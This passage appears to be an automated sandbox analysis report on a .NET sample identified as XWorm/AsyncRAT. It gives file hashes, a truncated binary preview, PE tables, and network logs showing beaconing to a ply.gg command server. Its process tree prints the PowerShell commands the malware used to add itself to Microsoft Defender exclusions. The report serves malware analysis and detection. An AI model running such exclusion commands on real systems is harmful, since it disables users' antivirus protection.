                                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Preview:@...e...........................................................
                                                                Process:C:\Users\user\Desktop\72OWK7wBVH.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):29
                                                                Entropy (8bit):3.598349098128234
                                                                Encrypted:false
                                                                SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                                                MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                                                SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                                                SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                                                SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                                                Malicious:false
                                                                Preview:....### explorer ###..[WIN]r
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Users\user\Desktop\72OWK7wBVH.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 14 16:54:54 2024, mtime=Sat Dec 14 16:54:54 2024, atime=Sat Dec 14 16:54:54 2024, length=72704, window=hide
                                                                Category:dropped
                                                                Size (bytes):735
                                                                Entropy (8bit):5.026761360030534
                                                                Encrypted:false
                                                                SSDEEP:12:8S3s43xyWC8dY//js8SLh51XjA69rH2LpKmCm/BmV:8SNht/+7s8shrzA69i1KmCm/Bm
                                                                MD5:21237855699496FFCADB4F0B6597C967
                                                                SHA1:A4AB7FB07B7AEDA6DD694FFE1F9DD544D7E26D97
                                                                SHA-256:08DD01E06B6A327F9D6D1494066D2BE346B6D6AC0199269F368DC15BE0541C9D
                                                                SHA-512:618677D82DB583810C4655FB0C4201D640564698245DB8D34C84E23B616BA2F6F088597610E31D3CF65B3DBCC52CE4646A992B06C0C8CB4E69F2E10539D23BA1
                                                                Malicious:false
                                                                Preview:L..................F.... ...=.#HQN..=.#HQN..=.#HQN..........................h.:..DG..Yr?.D..U..k0.&...&......vk.v.......!QN..a[@HQN......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......CW.^.Y............................2f..R.o.a.m.i.n.g.....T.2......Y. .SYSTEM..>......Y..Y.....]........................S.Y.S.T.E.M.......T...............-.......S...........,..p.....C:\Users\user\AppData\Roaming\SYSTEM........\.....\.....\.....\.....\.S.Y.S.T.E.M.`.......X.......473627...........hT..CrF.f4... .E..yD....,.......hT..CrF.f4... .E..yD....,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                Process:C:\Users\user\Desktop\72OWK7wBVH.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):72704
                                                                Entropy (8bit):6.0841332923455544
                                                                Encrypted:false
                                                                SSDEEP:1536:g6KqzkOtZ/KWOym8mLgLNlRePq+bP64pfzia8Sh66xXOs09Zs8:6/mZQhQXRei+bP64kmROsCS8
                                                                MD5:0860112F7BD00567371FAFFE18061CAB
                                                                SHA1:84A59BD00070C7BFEB141A2C745C31A6451F7DB9
                                                                SHA-256:E58E3513066CA537D090CDFAE72904220A90BA3B081BBD9D49318E27788C5729
                                                                SHA-512:6C62C5B6551825BFF75D3C62A214BAC9A9D5EB4FE982DC0B97531774309FE2DE52110204951B9E82954969CD98E2D95C41873EB35B1DDDFF8B8BF35D3759A1DF
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\SYSTEM, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\SYSTEM, Author: ditekSHen
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 76%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...6f]g.............................0... ...@....@.. ....................................@.................................\0..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................0......H........^..d.......&.....................................................(....*.r...p*. <...*..(....*.rK..p*. }(..*.s.........s.........s.........s.........*.r...p*. ....*.r...p*. .R..*.r)..p*. ...*.rs..p*. ~.H.*.r...p*. *p{.*..((...*.r...p*. .O..*.rG..p*"(....+.*&(....&+.*.+5sV... .... .'..oW...(,...~....-.(G...(9...~....oX...&.-.*.r...p*.rE..p*. .8..*.r...p*. .}.*.r...p*. ..H.*.r#..p*. ....*.rm..p*. 6V=.*..............j..................sY..............*"(I...+.*:.t....(
                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):6.0841332923455544
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                File name:72OWK7wBVH.exe
                                                                File size:72'704 bytes
                                                                MD5:0860112f7bd00567371faffe18061cab
                                                                SHA1:84a59bd00070c7bfeb141a2c745c31a6451f7db9
                                                                SHA256:e58e3513066ca537d090cdfae72904220a90ba3b081bbd9d49318e27788c5729
                                                                SHA512:6c62c5b6551825bff75d3c62a214bac9a9d5eb4fe982dc0b97531774309fe2de52110204951b9e82954969cd98e2d95c41873eb35b1dddff8b8bf35d3759a1df
                                                                SSDEEP:1536:g6KqzkOtZ/KWOym8mLgLNlRePq+bP64pfzia8Sh66xXOs09Zs8:6/mZQhQXRei+bP64kmROsCS8
                                                                TLSH:15639D8CB7E54A24E1FEDFB15DA66253C639F2231803D66F14C601DA2727A88CD50BF2
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...6f]g.............................0... ...@....@.. ....................................@................................
                                                                Icon Hash:90cececece8e8eb0
                                                                Entrypoint:0x4130ae
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x675D6636 [Sat Dec 14 11:04:22 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                Name | Virtual Address | Virtual Size | Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1305c | 0x4f | .text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14000 | 0x4ce | .rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x16000 | 0xc | .reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                .text | 0x2000 | 0x110b4 | 0x11200 | a16d4debf3e6176db93d0c6447ec96e0 | False | 0.6149920164233577 | data | 6.159483925482598 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rsrc | 0x14000 | 0x4ce | 0x600 | 47876d674e03afeaa7a2d0ab9714c884 | False | 0.375 | data | 3.7419403129268916 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc | 0x16000 | 0xc | 0x200 | 41a6fc4df2aefd789e923f0d41087724 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                RT_VERSION | 0x140a0 | 0x244 | data | | | 0.47413793103448276
                                                                RT_MANIFEST | 0x142e4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
                                                                DLL | Import
                                                                mscoree.dll | _CorExeMain
                                                                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                2024-12-14T18:55:10.501670+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49737 | 147.185.221.24 | 24891 | TCP
                                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                Dec 14, 2024 18:54:56.782618046 CET | 49737 | 24891 | 192.168.2.4 | 147.185.221.24
                                                                Dec 14, 2024 18:54:56.903428078 CET | 24891 | 49737 | 147.185.221.24 | 192.168.2.4
                                                                Dec 14, 2024 18:54:56.903968096 CET | 49737 | 24891 | 192.168.2.4 | 147.185.221.24
                                                                Dec 14, 2024 18:54:57.063486099 CET | 49737 | 24891 | 192.168.2.4 | 147.185.221.24
                                                                Dec 14, 2024 18:54:57.183526993 CET | 24891 | 49737 | 147.185.221.24 | 192.168.2.4
                                                                Dec 14, 2024 18:55:10.501669884 CET | 49737 | 24891 | 192.168.2.4 | 147.185.221.24
                                                                Dec 14, 2024 18:55:10.628555059 CET | 24891 | 49737 | 147.185.221.24 | 192.168.2.4
                                                                Dec 14, 2024 18:55:18.793708086 CET | 24891 | 49737 | 147.185.221.24 | 192.168.2.4
                                                                Dec 14, 2024 18:55:18.793814898 CET | 49737 | 24891 | 192.168.2.4 | 147.185.221.24
                                                                Dec 14, 2024 18:55:19.451656103 CET | 49737 | 24891 | 192.168.2.4 | 147.185.221.24
                                                                Dec 14, 2024 18:55:19.453624964 CET | 49790 | 24891 | 192.168.2.4 | 147.185.221.24
                                                                Dec 14, 2024 18:55:19.571449995 CET | 24891 | 49737 | 147.185.221.24 | 192.168.2.4
                                                                Dec 14, 2024 18:55:19.573353052 CET | 24891 | 49790 | 147.185.221.24 | 192.168.2.4
                                                                Dec 14, 2024 18:55:19.573451996 CET | 49790 | 24891 | 192.168.2.4 | 147.185.221.24
                                                                Dec 14, 2024 18:55:19.599795103 CET | 49790 | 24891 | 192.168.2.4 | 147.185.221.24
                                                                Dec 14, 2024 18:55:19.720964909 CET | 24891 | 49790 | 147.185.221.24 | 192.168.2.4
                                                                Dec 14, 2024 18:55:33.155133009 CET | 49790 | 24891 | 192.168.2.4 | 147.185.221.24
                                                                Dec 14, 2024 18:55:33.275046110 CET | 24891 | 49790 | 147.185.221.24 | 192.168.2.4
                                                                Dec 14, 2024 18:55:41.528280973 CET | 24891 | 49790 | 147.185.221.24 | 192.168.2.4
                                                                Dec 14, 2024 18:55:41.528352976 CET | 49790 | 24891 | 192.168.2.4 | 147.185.221.24
                                                                Dec 14, 2024 18:55:42.295285940 CET | 49790 | 24891 | 192.168.2.4 | 147.185.221.24
                                                                Dec 14, 2024 18:55:42.296703100 CET | 49842 | 24891 | 192.168.2.4 | 147.185.221.24
                                                                Dec 14, 2024 18:55:42.421380043 CET | 24891 | 49790 | 147.185.221.24 | 192.168.2.4
                                                                Dec 14, 2024 18:55:42.422430992 CET | 24891 | 49842 | 147.185.221.24 | 192.168.2.4
                                                                Dec 14, 2024 18:55:42.422610044 CET | 49842 | 24891 | 192.168.2.4 | 147.185.221.24
                                                                Dec 14, 2024 18:55:42.469079971 CET | 49842 | 24891 | 192.168.2.4 | 147.185.221.24
                                                                Dec 14, 2024 18:55:42.591227055 CET | 24891 | 49842 | 147.185.221.24 | 192.168.2.4
                                                                Dec 14, 2024 18:55:55.670514107 CET | 49842 | 24891 | 192.168.2.4 | 147.185.221.24
                                                                Dec 14, 2024 18:55:55.790405035 CET | 24891 | 49842 | 147.185.221.24 | 192.168.2.4
                                                                Dec 14, 2024 18:56:04.325500011 CET | 24891 | 49842 | 147.185.221.24 | 192.168.2.4
                                                                Dec 14, 2024 18:56:04.325577021 CET | 49842 | 24891 | 192.168.2.4 | 147.185.221.24
                                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                Dec 14, 2024 18:54:56.499934912 CET | 49343 | 53 | 192.168.2.4 | 1.1.1.1
                                                                Dec 14, 2024 18:54:56.774451017 CET | 53 | 49343 | 1.1.1.1 | 192.168.2.4
                                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                Dec 14, 2024 18:54:56.499934912 CET | 192.168.2.4 | 1.1.1.1 | 0x45b9 | Standard query (0) | if-sensors.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
                                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                Dec 14, 2024 18:54:56.774451017 CET | 1.1.1.1 | 192.168.2.4 | 0x45b9 | No error (0) | if-sensors.gl.at.ply.gg | | 147.185.221.24 | A (IP address) | IN (0x0001) | false


                                                                Target ID:0
                                                                Start time:12:53:57
                                                                Start date:14/12/2024
                                                                Path:C:\Users\user\Desktop\72OWK7wBVH.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\Desktop\72OWK7wBVH.exe"
                                                                Imagebase:0x510000
                                                                File size:72'704 bytes
                                                                MD5 hash:0860112F7BD00567371FAFFE18061CAB
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1683334094.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1683334094.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:1
                                                                Start time:12:54:00
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe'
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:12:54:00
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:12:54:07
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '72OWK7wBVH.exe'
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:12:54:07
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:12:54:17
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM'
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:12:54:17
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
